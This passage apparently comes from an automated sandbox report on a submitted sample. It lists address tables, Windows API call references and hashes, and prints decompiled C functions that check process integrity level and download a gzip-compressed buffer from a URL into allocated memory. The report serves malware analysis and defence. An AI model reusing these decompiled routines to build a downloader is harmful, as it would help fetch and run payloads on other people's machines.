                                                                                                                                                                                                                                                                                          0x000f4cf7
                                                                                                                                                                                                                                                                                          0x000f4cf9
                                                                                                                                                                                                                                                                                          0x000f4cfb
                                                                                                                                                                                                                                                                                          0x000f4cde
                                                                                                                                                                                                                                                                                          0x000f4ce1
                                                                                                                                                                                                                                                                                          0x000f4cec
                                                                                                                                                                                                                                                                                          0x000f4cf5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4d1a
                                                                                                                                                                                                                                                                                          0x000f4d1a
                                                                                                                                                                                                                                                                                          0x000f4d1c
                                                                                                                                                                                                                                                                                          0x000f4d1c
                                                                                                                                                                                                                                                                                          0x000f4cec
                                                                                                                                                                                                                                                                                          0x000f4cfc
                                                                                                                                                                                                                                                                                          0x000f4d04
                                                                                                                                                                                                                                                                                          0x000f4d25
                                                                                                                                                                                                                                                                                          0x000f4d35
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4d37
                                                                                                                                                                                                                                                                                          0x000f4d37
                                                                                                                                                                                                                                                                                          0x000f4d3b
                                                                                                                                                                                                                                                                                          0x000f4d3f
                                                                                                                                                                                                                                                                                          0x000f4d43
                                                                                                                                                                                                                                                                                          0x000f4d47
                                                                                                                                                                                                                                                                                          0x000f4d4b
                                                                                                                                                                                                                                                                                          0x000f4d4f
                                                                                                                                                                                                                                                                                          0x000f4d53
                                                                                                                                                                                                                                                                                          0x000f4d59
                                                                                                                                                                                                                                                                                          0x000f4d73
                                                                                                                                                                                                                                                                                          0x000f4d5b
                                                                                                                                                                                                                                                                                          0x000f4d5b
                                                                                                                                                                                                                                                                                          0x000f4d5f
                                                                                                                                                                                                                                                                                          0x000f4d63
                                                                                                                                                                                                                                                                                          0x000f4d67
                                                                                                                                                                                                                                                                                          0x000f4d67
                                                                                                                                                                                                                                                                                          0x000f4dab
                                                                                                                                                                                                                                                                                          0x000f4dab
                                                                                                                                                                                                                                                                                          0x000f4db7
                                                                                                                                                                                                                                                                                          0x000f4dbe
                                                                                                                                                                                                                                                                                          0x000f4dc5
                                                                                                                                                                                                                                                                                          0x000f4dcd
                                                                                                                                                                                                                                                                                          0x000f4dd4
                                                                                                                                                                                                                                                                                          0x000f4dde
                                                                                                                                                                                                                                                                                          0x000f4de5
                                                                                                                                                                                                                                                                                          0x000f4dec
                                                                                                                                                                                                                                                                                          0x000f4dee
                                                                                                                                                                                                                                                                                          0x000f4df7
                                                                                                                                                                                                                                                                                          0x000f4dfb
                                                                                                                                                                                                                                                                                          0x000f4dfb
                                                                                                                                                                                                                                                                                          0x000f4dfd
                                                                                                                                                                                                                                                                                          0x000f4e03
                                                                                                                                                                                                                                                                                          0x000f4e05
                                                                                                                                                                                                                                                                                          0x000f4e05
                                                                                                                                                                                                                                                                                          0x000f4e07
                                                                                                                                                                                                                                                                                          0x000f4e0b
                                                                                                                                                                                                                                                                                          0x000f4e10
                                                                                                                                                                                                                                                                                          0x000f4e14
                                                                                                                                                                                                                                                                                          0x000f4e14
                                                                                                                                                                                                                                                                                          0x000f4e16
                                                                                                                                                                                                                                                                                          0x000f4e1c
                                                                                                                                                                                                                                                                                          0x000f4e1e
                                                                                                                                                                                                                                                                                          0x000f4e1e
                                                                                                                                                                                                                                                                                          0x000f4e31
                                                                                                                                                                                                                                                                                          0x000f4e3b
                                                                                                                                                                                                                                                                                          0x000f4e3c
                                                                                                                                                                                                                                                                                          0x000f4e3d
                                                                                                                                                                                                                                                                                          0x000f4e48
                                                                                                                                                                                                                                                                                          0x000f4e48
                                                                                                                                                                                                                                                                                          0x000f4d06
                                                                                                                                                                                                                                                                                          0x000f4d06
                                                                                                                                                                                                                                                                                          0x000f4d08
                                                                                                                                                                                                                                                                                          0x000f4d09
                                                                                                                                                                                                                                                                                          0x000f4d0a
                                                                                                                                                                                                                                                                                          0x000f4d19
                                                                                                                                                                                                                                                                                          0x000f4d19
                                                                                                                                                                                                                                                                                          0x000f4d04

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 000F4C94
                                                                                                                                                                                                                                                                                          • GetParent.USER32 ref: 000F4CAB
                                                                                                                                                                                                                                                                                          • GetWindow.USER32(?,00000004), ref: 000F4CB8
                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 000F4CC8
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 000F4CE1
                                                                                                                                                                                                                                                                                          • MonitorFromWindow.USER32(?,00000002), ref: 000F4CFC
                                                                                                                                                                                                                                                                                          • GetMonitorInfoA.USER32 ref: 000F4D2D
                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 000F4D73
                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000002,000000FF,000000FF,00000015,?,00000000,?,00000002,?,?,?,?), ref: 000F4E31
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$LongMonitorRect$FromInfoParent
                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                          • API String ID: 1468510684-3887548279
                                                                                                                                                                                                                                                                                          • Opcode ID: 27338e28d6f1f507e9ea4b542998fe6ba8617392944cba65e40f05be6d727e60
                                                                                                                                                                                                                                                                                          • Instruction ID: beb3060789635822ab35c225702c2077ed06111c82c739af96991752938708c8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27338e28d6f1f507e9ea4b542998fe6ba8617392944cba65e40f05be6d727e60
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 235179716083059FC354CF28D988A6BB7EABBC8714F104A2DFA55C3694EB70EC458B92
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 0252B1D1
                                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0252B1D8
                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0252B201
                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 0252B23E
                                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 0252B274
                                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?,00000000), ref: 0252B28A
                                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 0252B2AD
                                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?), ref: 0252B2C3
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0252B341
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                                          • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                                          • Opcode ID: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                                          • Instruction ID: 91f868651a1bcb0868eabc6d0969d515e538b25d35ca389a9f27be82e5004dad
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE410F75A042189BEB24CF94CC45FDAB7BCFF48704F04C1A4E649A6280DB749A86DFA5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                          			E04002AF0(char* _a4, intOrPtr _a8, long _a12, signed char _a16) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                                          				signed int _v92;
                                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                                          				void _v100;
                                                                                                                                                                                                                                                                                          				void _v356;
                                                                                                                                                                                                                                                                                          				long _v360;
                                                                                                                                                                                                                                                                                          				long _v364;
                                                                                                                                                                                                                                                                                          				intOrPtr _v368;
                                                                                                                                                                                                                                                                                          				void* _v372;
                                                                                                                                                                                                                                                                                          				long _v376;
                                                                                                                                                                                                                                                                                          				void* _v380;
                                                                                                                                                                                                                                                                                          				signed char _v381;
                                                                                                                                                                                                                                                                                          				long _v388;
                                                                                                                                                                                                                                                                                          				long _v392;
                                                                                                                                                                                                                                                                                          				void* _v396;
                                                                                                                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                                                                                                                          				long _v656;
                                                                                                                                                                                                                                                                                          				long _v660;
                                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                                                                                                                          				long _t149;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if( *0x4013b80 == 0 || _a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					memcpy( &_v84, "Accept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\n", 0x10 << 2);
                                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                                          					_v92 = 0x80000200;
                                                                                                                                                                                                                                                                                          					if((_a16 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						_v92 = _v92 | 0x00803000;
                                                                                                                                                                                                                                                                                          						_v96 = 4;
                                                                                                                                                                                                                                                                                          						_t139 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                                          						InternetQueryOptionA(_t139, 0x1f,  &_v100,  &_v96);
                                                                                                                                                                                                                                                                                          						_v100 = _v100 | 0x00000100;
                                                                                                                                                                                                                                                                                          						_t140 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                                          						InternetSetOptionA(_t140, 0x1f,  &_v100, 4);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t142 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                                          					_v88 = InternetOpenUrlA(_t142, _a4,  &_v84, 0x42, _v92, 0);
                                                                                                                                                                                                                                                                                          					if(_v88 == 0) {
                                                                                                                                                                                                                                                                                          						_v660 = GetLastError();
                                                                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v360 = 0x100;
                                                                                                                                                                                                                                                                                          						E04007D20( &_v356,  &_v356, 0, 0x100);
                                                                                                                                                                                                                                                                                          						_v364 = 0;
                                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v88, 0x13,  &_v356,  &_v360,  &_v364) == 0) {
                                                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v88);
                                                                                                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v368 = E04007DD0( &_v356);
                                                                                                                                                                                                                                                                                          						if(_v368 != 0xc8) {
                                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v372 = VirtualAlloc(0, _a12, 0x3000, 4);
                                                                                                                                                                                                                                                                                          						if(_v372 == 0) {
                                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v388 = 0;
                                                                                                                                                                                                                                                                                          						_v376 = 0;
                                                                                                                                                                                                                                                                                          						_v380 = _v372;
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							InternetReadFile(_v88, _v380, _a12,  &_v376);
                                                                                                                                                                                                                                                                                          							if(_v376 == 0) {
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v388 = _v388 + _v376;
                                                                                                                                                                                                                                                                                          							_v380 = _v380 + _v376;
                                                                                                                                                                                                                                                                                          							_t149 = _a12 - _v376;
                                                                                                                                                                                                                                                                                          							_a12 = _t149;
                                                                                                                                                                                                                                                                                          							if(_t149 >= 0) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L16:
                                                                                                                                                                                                                                                                                          							_v8 = _v388;
                                                                                                                                                                                                                                                                                          							_v396 = _v372;
                                                                                                                                                                                                                                                                                          							_v392 = 0x100;
                                                                                                                                                                                                                                                                                          							E04007D20(_v388,  &_v652, 0, 0x100);
                                                                                                                                                                                                                                                                                          							_v381 = 0;
                                                                                                                                                                                                                                                                                          							if(HttpQueryInfoA(_v88, 0x1d,  &_v652,  &_v392,  &_v364) != 0 && lstrcmpiA( &_v652, "gzip") == 0) {
                                                                                                                                                                                                                                                                                          								_v656 = E04002E00(_v388, _v372, _v388, _a8, _a12);
                                                                                                                                                                                                                                                                                          								if(_v656 > 0) {
                                                                                                                                                                                                                                                                                          									_v8 = _v656;
                                                                                                                                                                                                                                                                                          									_v396 = _a8;
                                                                                                                                                                                                                                                                                          									_v381 = 1;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if((_v381 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          								E04007B70(_a8, _v372, _v8);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							VirtualFree(_v372, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                                          0x04002afb
                                                                                                                                                                                                                                                                                          0x04002b09
                                                                                                                                                                                                                                                                                          0x04002df2
                                                                                                                                                                                                                                                                                          0x04002dfa
                                                                                                                                                                                                                                                                                          0x04002b2d
                                                                                                                                                                                                                                                                                          0x04002b3a
                                                                                                                                                                                                                                                                                          0x04002b3c
                                                                                                                                                                                                                                                                                          0x04002b3e
                                                                                                                                                                                                                                                                                          0x04002b3f
                                                                                                                                                                                                                                                                                          0x04002b4c
                                                                                                                                                                                                                                                                                          0x04002b57
                                                                                                                                                                                                                                                                                          0x04002b5a
                                                                                                                                                                                                                                                                                          0x04002b6b
                                                                                                                                                                                                                                                                                          0x04002b72
                                                                                                                                                                                                                                                                                          0x04002b81
                                                                                                                                                                                                                                                                                          0x04002b8c
                                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                                          0x04002ba9
                                                                                                                                                                                                                                                                                          0x04002bb6
                                                                                                                                                                                                                                                                                          0x04002bbd
                                                                                                                                                                                                                                                                                          0x04002de0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                                          0x04002bdb
                                                                                                                                                                                                                                                                                          0x04002be3
                                                                                                                                                                                                                                                                                          0x04002c10
                                                                                                                                                                                                                                                                                          0x04002dce
                                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                                          0x04002c25
                                                                                                                                                                                                                                                                                          0x04002c35
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002c4e
                                                                                                                                                                                                                                                                                          0x04002c5b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002c61
                                                                                                                                                                                                                                                                                          0x04002c6b
                                                                                                                                                                                                                                                                                          0x04002c7b
                                                                                                                                                                                                                                                                                          0x04002c81
                                                                                                                                                                                                                                                                                          0x04002c97
                                                                                                                                                                                                                                                                                          0x04002ca4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002cb4
                                                                                                                                                                                                                                                                                          0x04002cc6
                                                                                                                                                                                                                                                                                          0x04002ccf
                                                                                                                                                                                                                                                                                          0x04002cd5
                                                                                                                                                                                                                                                                                          0x04002cd8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002cdc
                                                                                                                                                                                                                                                                                          0x04002cde
                                                                                                                                                                                                                                                                                          0x04002ce4
                                                                                                                                                                                                                                                                                          0x04002ced
                                                                                                                                                                                                                                                                                          0x04002cf3
                                                                                                                                                                                                                                                                                          0x04002d0b
                                                                                                                                                                                                                                                                                          0x04002d13
                                                                                                                                                                                                                                                                                          0x04002d3d
                                                                                                                                                                                                                                                                                          0x04002d70
                                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                                          0x04002d85
                                                                                                                                                                                                                                                                                          0x04002d8b
                                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                                          0x04002da1
                                                                                                                                                                                                                                                                                          0x04002db2
                                                                                                                                                                                                                                                                                          0x04002db7
                                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002ca6
                                                                                                                                                                                                                                                                                          0x04002bbd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B72
                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B93
                                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 04002BB0
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04002C08
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04002C48
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 04002C97
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 04002D35
                                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,gzip), ref: 04002D4B
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002DC8
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002DD2
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002DDA
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 04002B32
                                                                                                                                                                                                                                                                                          • gzip, xrefs: 04002D3F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                                                          • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                                                          • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                                                          • Opcode ID: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                                          • Instruction ID: 59e70dbda308a2a2546c0d296605ce979221f8659c43edef85f985c08622dbb4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B91FC75904218ABEB65CF94CC48BEAB7B5BB48304F50819DE609BB280DB796E84CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                                                                                          			E000FE5F0(struct HMENU__* __ecx, unsigned int __edx, intOrPtr _a4, int _a8, struct HMENU__** _a12) {
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v176;
                                                                                                                                                                                                                                                                                          				struct HMENU__** _v180;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v184;
                                                                                                                                                                                                                                                                                          				intOrPtr _v188;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v236;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t60;
                                                                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                                                                                                          				int _t68;
                                                                                                                                                                                                                                                                                          				int _t72;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t74;
                                                                                                                                                                                                                                                                                          				int _t75;
                                                                                                                                                                                                                                                                                          				int _t77;
                                                                                                                                                                                                                                                                                          				intOrPtr _t81;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t84;
                                                                                                                                                                                                                                                                                          				int _t86;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          				int _t100;
                                                                                                                                                                                                                                                                                          				signed char _t102;
                                                                                                                                                                                                                                                                                          				signed int _t107;
                                                                                                                                                                                                                                                                                          				intOrPtr _t115;
                                                                                                                                                                                                                                                                                          				intOrPtr _t119;
                                                                                                                                                                                                                                                                                          				void* _t120;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t122;
                                                                                                                                                                                                                                                                                          				void* _t126;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t127;
                                                                                                                                                                                                                                                                                          				CHAR** _t128;
                                                                                                                                                                                                                                                                                          				signed int _t130;
                                                                                                                                                                                                                                                                                          				void* _t131;
                                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t114 = __edx;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F5E5);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t132 = _t131 - 0xe0;
                                                                                                                                                                                                                                                                                          				_t60 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t61 = _t60 ^ _t130;
                                                                                                                                                                                                                                                                                          				_v24 = _t61;
                                                                                                                                                                                                                                                                                          				_push(_t61);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t97 = __ecx;
                                                                                                                                                                                                                                                                                          				_t124 = __edx;
                                                                                                                                                                                                                                                                                          				_t119 = _a4;
                                                                                                                                                                                                                                                                                          				_t102 =  *(_t119 + 0x84);
                                                                                                                                                                                                                                                                                          				_v188 = _t119;
                                                                                                                                                                                                                                                                                          				_v180 = _a12;
                                                                                                                                                                                                                                                                                          				if((_t102 & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                                          					__eflags = __edx >> 0x10 - 0xffff;
                                                                                                                                                                                                                                                                                          					if(__edx >> 0x10 != 0xffff) {
                                                                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                                                                          						 *_v180 = 0;
                                                                                                                                                                                                                                                                                          						 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          						_pop(_t120);
                                                                                                                                                                                                                                                                                          						_pop(_t126);
                                                                                                                                                                                                                                                                                          						_pop(_t98);
                                                                                                                                                                                                                                                                                          						return E001059E6(1, _t98, _v24 ^ _t130, _t114, _t120, _t126);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__eflags = __ecx;
                                                                                                                                                                                                                                                                                          					if(__ecx != 0) {
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__eflags = _t102 & 0x00000004;
                                                                                                                                                                                                                                                                                          					if((_t102 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                                          						_t67 =  *((intOrPtr*)(_t119 + 0x18));
                                                                                                                                                                                                                                                                                          						_t23 = _t67 - 1; // -1
                                                                                                                                                                                                                                                                                          						_t107 = _t23;
                                                                                                                                                                                                                                                                                          						__eflags = _t107;
                                                                                                                                                                                                                                                                                          						if(_t107 < 0) {
                                                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t115 =  *((intOrPtr*)(_t119 + 0x14));
                                                                                                                                                                                                                                                                                          						_t127 =  *(_t115 + _t107 * 4);
                                                                                                                                                                                                                                                                                          						_t114 = _t115 + _t107 * 4;
                                                                                                                                                                                                                                                                                          						_v184 = _t127;
                                                                                                                                                                                                                                                                                          						__eflags = _t107 - _t67;
                                                                                                                                                                                                                                                                                          						if(_t107 >= _t67) {
                                                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t30 = _t67 - 1; // -1
                                                                                                                                                                                                                                                                                          						__eflags = _t107 - _t30;
                                                                                                                                                                                                                                                                                          						if(_t107 != _t30) {
                                                                                                                                                                                                                                                                                          							_t84 = _t67 - _t107 + _t67 - _t107 + _t67 - _t107 + _t67 - _t107;
                                                                                                                                                                                                                                                                                          							__eflags = _t84;
                                                                                                                                                                                                                                                                                          							_t31 = _t84 - 4; // -4
                                                                                                                                                                                                                                                                                          							E000F1240(_t84, _t114, _t84, _t114 + 4, _t31);
                                                                                                                                                                                                                                                                                          							_t132 = _t132 + 0x10;
                                                                                                                                                                                                                                                                                          						}
